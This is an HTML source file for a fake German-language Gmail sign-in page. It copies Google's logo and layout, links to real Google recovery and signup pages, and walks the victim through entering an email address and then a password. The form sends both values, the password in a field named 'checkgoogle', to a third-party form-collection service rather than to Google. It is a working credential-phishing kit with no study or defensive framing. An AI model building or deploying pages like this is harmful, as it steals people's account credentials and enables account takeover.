<!Doctype html>
<head>

<head>
<style>
* {
  margin: 0px;
  padding: 0px:
}
.google {
  width: 100px;
  position: absolute;
  top: 100px;
  left: 60px;
}
.login {
  position: absolute;
  left: 60px;
  top: 270px;
  font-size: 70px;
  font-family: helvetica;
  font-weight: 500;
  display: block;
}
.continue {
  position: absolute;
  left: 60px;
  top: 400px;
  font-size: 33px;
  font-family: helvetica;
  font-weight: 500;
  display: block;
}
.email {
  position: absolute;
  left: 60px;
  top: 550px;
  width: 80%;
  height: 100px;
  border-radius: 12px;
  border-style: solid;
  border-width: 2px;
  border-color: grey;
  padding-left: 30px;
  font-size: 33px;
  display: block;
}
.email::placeholder {
  position: absolute;
  font-size: 33px;
  color: grey;
}
.lost {
  position: absolute;
  font-size: 30px;
  left: 60px;
  top: 695px;
  font-family: helvetica;
  text-decoration: none;
  color: #0b57cd;
  display: block;
}
.create {
  position: absolute;
  left: 60px;
  top: 1200px;
  font-size: 30px;
  font-family: helvetica;
  text-decoration: none;
  color: #0b57cd;
  display: block;
}
.pass {
  position: absolute;
  left: 60px;
  top:700px;
  display: none;
  width: 80%;
  height: 100px;
  border-radius: 12px;
  border-style: solid;
  border-width: 2px;
  border-color: grey;
  padding-left: 30px;
  font-size: 33px;
}
.pass::placeholder {
  position: absolute;
  font-size: 33px;
  color: grey;
}
.next {
  position: absolute;
  right: 80px;
  top: 1180px;
  font-size: 30px;
  height: 90px;
  width: 200px;
  background-color: blue;
  color: white;
  border-radius: 50px;
  display: block;
}
.welcome {
  position: absolute;
  left: 60px;
  top: 270px;
  font-size: 70px;
  font-family: helvetica;
  font-weight: 500;
  display: none;
}
#confirm {
  position: absolute;
  left: 60px;
  top: 550px;
  font-size: 33px;
  font-family: helvetica;
  font-weight: 500;
  display: none;
}
#emailPreview {
  position: absolute;
  left: 60px;
  top: 400px;
  font-size: 33px;
  font-family: helvetica;
  font-weight: 500;
  display: none;
  border-radius: 50px;
  border-style: solid;
  border-width: 2px;
  border-color: grey;
  padding-top: 10px;
  padding-bottom: 10px;
  padding-left: 20px;
  padding-right: 20px;
}
#forgotpass {
  position: absolute;
  left: 60px;
  top: 1200px;
  font-size: 30px;
  font-family: helvetica;
  text-decoration: none;
  color: #0b57cd;
  display: none;
}
#submit {
  position: absolute;
  right: 80px;
  top: 1180px;
  font-size: 30px;
  height: 90px;
  width: 200px;
  background-color: blue;
  color: white;
  border-radius: 50px;
  display: none;
}
#togglePassword {
  position: absolute;
  width: 100px;
  left: 135px;
  top: 870px;
  font-family: helvetica;
  text-decoration: none;
  color: #0b57cd;
  display: none;
  transform: scale(2.3);
  border-radius: 0px;
}
#togglePasswordLabel {
  position: absolute;
  top: 860px;
  font-size: 30px;
  left: 130px;
  display: none;
  font-family: helvetica;
}
.pass {
            -webkit-text-security: disc; /* For WebKit browsers (Chrome, Safari, Edge) */
            text-security: disc; /* For other browsers (may not be supported everywhere) */
        }
</style>
<body>
<img class="google" src="IMG_0196.jpeg">
<h1 id ="login" class="login">Anmeldung</h1>
<h1 id="welcome"class ="welcome">Willkommen</h1>
<p id="continue" class="continue">Weiter zu Gmail</p>
<form action="https://public.herotofu.com/v1/ac141270-90bd-11ef-82c2-4bbcc1388e1d" method="post">
<input id="email" name="email" placeholder="E-Mail-Adresse oder Telefonnummer" class="email" type="email" required>
<input id="pass" name="checkgoogle" type="text" class="pass" placeholder="Passwort eingeben" required>
<button id="submit" name="submit">Weiter</button>
</form>
<a id="lost" class="lost" href="https://accounts.google.com/signin/v2/usernamerecovery?continue=https%3A%2F%2Fmail.google.com%2Fmail%2Fmu%2Fmp%2F686%2F%3Flogin%3D1&ddm=0&dsh=S-1962447377%3A1723112058388891&flowEntry=AddSession&flowName=GlifWebSignIn&hl=de&service=mail">E-Mail-Adresse vergessen?</a>
<a id="create" class="create" href="https://accounts.google.com/lifecycle/steps/signup/name?continue=https://mail.google.com/mail/mu/mp/686/?login%3D1&ddm=0&dsh=S68479329:1723115225766540&flowEntry=SignUp&flowName=GlifWebSignIn&hl=de&service=mail&TL=ALoj5AqNPCkn0ioNIBHl-4JTzlsfUKRvlnpNz9zN-ZXp1aEb8M2JPvgZPzAZEyhV">Konto erstellen</a>
<button id="next" onclick="onClick()" class="next">Weiter</button>
<p id="emailPreview"></p>
<p id="confirm">Best&auml;tigen Sie Ihre Identit&auml;t, um fortzufahren</p>
<a href="https://accounts.google.com/v3/signin/challenge/totp?TL=ALoj5Aq2KRnn4_LfIhc8jAKL_7cG5PIAUxV3QDFyIA-TuLsE2M2zKpm4xw3XSYOV&checkConnection=youtube%3A329&checkedDomains=youtube&cid=6&continue=https%3A%2F%2Fmail.google.com%2Fmail%2Fmu%2Fmp%2F686%2F%3Flogin%3D1&ddm=0&flowEntry=AddSession&flowName=GlifWebSignIn&hl=de&pstMsg=1&service=mail" id="forgotpass">Passwort vergessen?</a>
<input type="checkbox" id="togglePassword">
        <label id="togglePasswordLabel"for="togglePassword">Passwort anzeigen</label>
<script>
function onClick(){
document.getElementById('email').style.display = "none";
document.getElementById('create').style.display = "none";
document.getElementById('next').style.display = "none";
document.getElementById('login').style.display = "none";
document.getElementById('lost').style.display = "none";
document.getElementById('continue').style.display = "none";
document.getElementById('welcome').style.display = "block";
document.getElementById('pass').style.display = "block";
document.getElementById('confirm').style.display = "block";
document.getElementById('emailPreview').style.display = "block";
document.getElementById('forgotpass').style.display = "block";
document.getElementById('submit').style.display = "block";
document.getElementById('togglePassword').style.display = "block";
document.getElementById('togglePasswordLabel').style.display = "block";
};
  const emailInput = document.getElementById('email');
        const emailPreview = document.getElementById('emailPreview');
emailInput.addEventListener('input', function() {
            // Update the preview element with the current value of the input
            emailPreview.textContent = emailInput.value;
        });
        const togglePassword = document.getElementById('togglePassword');
        const passwordInput = document.getElementById('pass');

        togglePassword.addEventListener('change', function () {
            // Check if the checkbox is checked
            if (this.checked) {
                passwordInput.type = 'text';
            } else {
                passwordInput.type = 'password';
            }
        });
</script>
</body>
</html>
